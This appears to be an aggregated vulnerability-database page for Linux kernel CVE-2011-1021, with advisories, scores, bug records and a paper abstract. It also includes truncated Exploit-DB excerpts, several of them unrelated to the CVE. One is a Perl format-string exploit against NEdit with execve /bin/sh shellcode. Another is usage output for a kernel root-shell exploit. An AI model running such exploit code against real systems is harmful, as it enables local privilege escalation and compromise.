CVE-2011-1021
published 2012-06-21
CVE-2011-1021: drivers/acpi/debugfs.c in the Linux kernel before 3.0 allows local users to modify arbitrary kernel memory locations by leveraging root privileges to write to…
Priority P4 · 21 · low · 3.6 · CVSS 2.0
AV:L/AC:L/Au:N/C:N/I:P/A:P
EXPLOIT
EPSS 0.93% (56.1th percentile)
drivers/acpi/debugfs.c in the Linux kernel before 3.0 allows local users to modify arbitrary kernel memory locations by leveraging root privileges to write to the /sys/kernel/debug/acpi/custom_method file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-4347.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | <= 2.6.9 | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | >= 0 < 3.11.0-12.19 | 3.11.0-12.19 |
CVSS provenance
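| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 3.6 | LOW | AV:L/AC:L/Au:N/C:N/I:P/A:P |
| osv | — | 6.9 | MEDIUM | — |
| vendor_redhat | — | 6.9 | MEDIUM | — |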
Red Hat
kernel: /sys/kernel/debug/acpi/custom_method can bypass module restrictions
vendor_redhat·2011-02-22·CVSS 6.9
CVE-2011-1021 [MEDIUM] kernel: /sys/kernel/debug/acpi/custom_method can bypass module restrictions
drivers/acpi/debugfs.c in the Linux kernel before 3.0 allows local users to modify arbitrary kernel memory locations by leveraging root privileges to write to the /sys/kernel/debug/acpi/custom_method file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-4347.
Statement: The versions of the Linux kernel as shipped with Red Hat Enterprise Linux 4, 5, and 6 are not affected, as they did not include upstream commits a1a541d8 and a25ee920 that introduced the problem. This has been addressed in Red Hat Enterprise MRG via https://rhn.redhat.com/errata/RHSA-2011-1253.html.
Notes:
This requires debugfs to be mounted on a local system in order to have access
to the custom_method file. Debugfs is not mounted by default. Y
GHSA
GHSA-42f2-xvqw-p5x2: drivers/acpi/debugfs
ghsa_unreviewed·2022-05-17·CVSS 6.9
CVE-2011-1021 [MEDIUM] GHSA-42f2-xvqw-p5x2: drivers/acpi/debugfs
drivers/acpi/debugfs.c in the Linux kernel before 3.0 allows local users to modify arbitrary kernel memory locations by leveraging root privileges to write to the /sys/kernel/debug/acpi/custom_method file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-4347.
OSV
CVE-2011-1021: drivers/acpi/debugfs
osv·2012-06-21·CVSS 6.9
CVE-2011-1021 [MEDIUM] CVE-2011-1021: drivers/acpi/debugfs
drivers/acpi/debugfs.c in the Linux kernel before 3.0 allows local users to modify arbitrary kernel memory locations by leveraging root privileges to write to the /sys/kernel/debug/acpi/custom_method file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-4347.
No detection rules found.
Exploit-DB
Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities
exploitdb·2012-02-02
CVE-2012-1007 Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities
---
##############################################################################
#
# Title : Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
# Author : Antu Sanadi SecPod Technologies (www.secpod.com)
# Vendor : http://struts.apache.org/
# Advisory : http://secpod.org/blog/?p=450
# http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt
# Software : Apache struts 1.3.10, 2.0.14 and 2.2.3
# Date : 01/02/2012
#
##############################################################################
SecPod ID: 1021
21/07/2011 Issue Discovered
03/08/2011 Vendor Notified
No Response
01/02/2012 Advisory Released
Class: Cross-Site Scripting (Persistence)
Severity: High
Overvie
Exploit-DB
IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery
exploitdb·2011-06-15·CVSS 6.8
CVE-2010-3271 [MEDIUM] IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery
---
Core Security Technologies - CoreLabs Advisory
http://corelabs.coresecurity.com/
IBM WebSphere Application Server Cross-Site Request Forgery
1. *Advisory Information*
Title: IBM WebSphere Application Server Cross-Site Request Forgery
Advisory ID: CORE-2010-1021
Advisory URL: http://www.coresecurity.com/content/IBM-WebSphere-CSRF
Date published: 2011-06-15
Date of last update: 2011-06-15
Vendors contacted: IBM
Release mode: User release
2. *Vulnerability Information*
Class: Cross-Site Request Forgery (CSRF) [CWE-352]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2010-3271
3. *Vulnerability Description*
WebSphere is IBM
Exploit-DB
NEdit 5.5 - Format String
exploitdb·2011-04-14
---
# Exploit Title: Format string vulnerability in Nedit <= 5.5.
# Date: 04/13/2011
# Author: Tosh (The bug was already patched when I'd found the vuln)
# Email: [email protected]
# Patch:
http://nedit.cvs.sourceforge.net/viewvc/nedit/nedit/source/preferences.c?r1=1.159&r2=1.160&view=patch
# Version: Nedit 5.5
# Tested on: FreeBSD 8.2-RELEASE
# CVE: don't found
#!/usr/bin/perl -w
use strict;
my $exit_addr = 0x0815a86c;
my $sc =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
"\x54\x53\xb0\x3b\x50\xcd\x80";
my (@payload) = ("./nedit", "-import",
pack('L',$exit_addr).pack('L',$exit_addr+1).pack('L',$exit_addr+2).pack('L',$exit_addr+3).
"%1021\$.8x-"."%1\$127x%1021\$n%1\$083x%1022\$n%1\$212x%1023\$n%1\$256x%1024\$n"
. $sc);
exec(@paylo
Exploit-DB
Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation
exploitdb·2010-12-18·CVSS 6.9
CVE-2011-1021 [MEDIUM] Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation
Linux Kernel
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347
*
* This custom_method file allows to inject custom ACPI methods into the ACPI
* interpreter tables. This control file was introduced with world writeable
* permissions in Linux Kernel 2.6.33.
*
* Usage:
*
* $ gcc american-sign-language.c -o american-sign-language
* $ ./american-sign-language
* [+] resolving required symbols...
* [+] checking for world-writable custom_method...
* [+] checking for an ACPI LID device...
* [+] poisoning ACPI tables via custom_method...
* [+] triggering ACPI payload via LID device...
* [+] triggering exploit via futimesat...
* [+] launching root shell!
* # id
* uid=0(root) gid=0(root) groups=0(root)
*
* Notes:
*
* This vuln allows us to writ
arXiv
Characteristics, Root Causes, and Detection of Incomplete Security Bug Fixes in the Linux Kernel
arxiv_fulltext·2025-11-21
Characteristics, Root Causes, and Detection of
Incomplete Security Bug Fixes in the Linux Kernel
Qiang Liu^1 (all work was done by Aug. 2022),
Wenlong Zhang^1,
Muhui Jiang^2,1,
Lei Wu^1,
Yajin Zhou^1
^1 Zhejiang University,
^2 The Hong Kong Polytechnic University
## Abstract
Security bugs in the Linux kernel emerge endlessly and have attracted much
attention.
However, fixing security bugs in the Linux kernel could be incomplete due to
human mistakes.
Specifically, an incomplete fix fails to repair all the original security
defects in the software, fails to properly repair the original security defects,
or introduces new ones.
In this paper, we study the fixes of incomplete security bugs in the Linux
kernel for the first time, and reveal their characteristics, root causes as well
as de
Bugzilla
CVE-2011-1021 kernel: /sys/kernel/debug/acpi/custom_method can bypass module restrictions
bugzilla·2011-02-28·CVSS 6.9
CVE-2011-1021 [MEDIUM] CVE-2011-1021 kernel: /sys/kernel/debug/acpi/custom_method can bypass module restrictions
Since /sys/kernel/debug/acpi/custom_method can be used to write arbitrary kernel memory (http://jon.oberheide.org/files/american-sign-language.c), it should be able to be left out of the kernel for system owners that want to be as defensive as possible to potential attacks, even from the root user. See as examples: CONFIG_DEVKMEM, CONFIG_STRICT_DEVMEM, and /proc/sys/kernel/modules_disabled.
https://lkml.org/lkml/2011/2/22/369
Discussion:
I believe this is the upstream solution
ed3aada1bf34c5a9e98af167f125f8a740fc726a
---
Statement:
The versions of the Linux kernel as shipped with Red Hat Enterprise Linux 4, 5, and 6 are not affected, as they did not include upstream commits a1a541d8 and a25ee920 that introduced the pr
http://ftp.osuosl.org/pub/linux/kernel/v3.0/ChangeLog-3.0
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=526b4af47f44148c9d665e57723ed9f86634c6e3
http://www.openwall.com/lists/oss-security/2011/02/25/5
https://bugzilla.redhat.com/show_bug.cgi?id=680841
https://github.com/torvalds/linux/commit/526b4af47f44148c9d665e57723ed9f86634c6e3